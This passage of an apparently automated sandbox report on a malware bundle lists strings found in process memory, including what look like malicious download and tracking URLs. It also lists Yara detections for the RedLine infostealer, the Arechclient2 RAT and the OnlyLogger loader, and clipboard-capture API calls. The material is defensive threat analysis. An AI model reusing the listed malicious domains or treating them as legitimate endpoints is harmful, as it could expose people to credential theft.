                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_6
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_7
                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 0000002F.00000002.4175875048.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 0000002F.00000002.4175875048.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                  Source: explorer.exe, 0000002F.00000000.1859126284.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1849323092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4157518851.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 0000002F.00000002.4175875048.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1820732501.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672226318.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820315915.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/ys
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4155333560.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3503554014.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506572383.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/z
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sZ
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat$
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat$8
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2017416180.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat(
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat)https://t.gogamec.com/2302/sqlite.dat3
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat02/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat9
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datG
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datP
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2017416180.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datPrxy
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datT
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datc.com/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datd
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.date.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3506530200.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datm
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datp
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dats://t.gogamec.com/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datt.gogamec.com/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dattc
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2017416180.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datx
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002473000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000248B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000245C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000245C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_1
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_2
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_3
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_4
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_5
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_6
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_7
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                  Source: explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                  Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49736 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:59963 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: Yara match | File source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Code function: 0_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, | 0_2_004056E3

                  E-Banking Fraud

                  Source: Yara match | File source: 19.0.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 19.2.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.3.setup_installer.exe.320451a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.3.setup_installer.exe.320451a.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.3.setup_installer.exe.31d6d4a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Mon17c604381c7047e.exe PID: 7940, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, type: DROPPED
                  Source: Yara match | File source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 22.0.Mon178817e243.exe.e60000.0.unpack, type: UNPACKEDPE, Matched rule: Detects downloader / injector, Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects OnlyLogger loader variants, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects OnlyLogger loader variants, Author: ditekSHen
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPE, Matched rule: Detects OnlyLogger loader variants, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 1.3.setup_installer.exe.30bf192.11.raw.unpack, type: UNPACKEDPE, Matched rule: Detects downloader / injector, Author: ditekSHen
                  Source: 2.2.setup_install.exe.6b280000.2.unpack, type: UNPACKEDPE, Matched rule: Detects unknown loader / injector, Author: ditekSHen
                  Source: 1.3.setup_installer.exe.2f30000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects unknown loader / injector, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.17f0e50.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.3140000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 1.3.setup_installer.exe.2f66740.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects unknown loader / injector, Author: ditekSHen
                  Source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects OnlyLogger loader variants, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
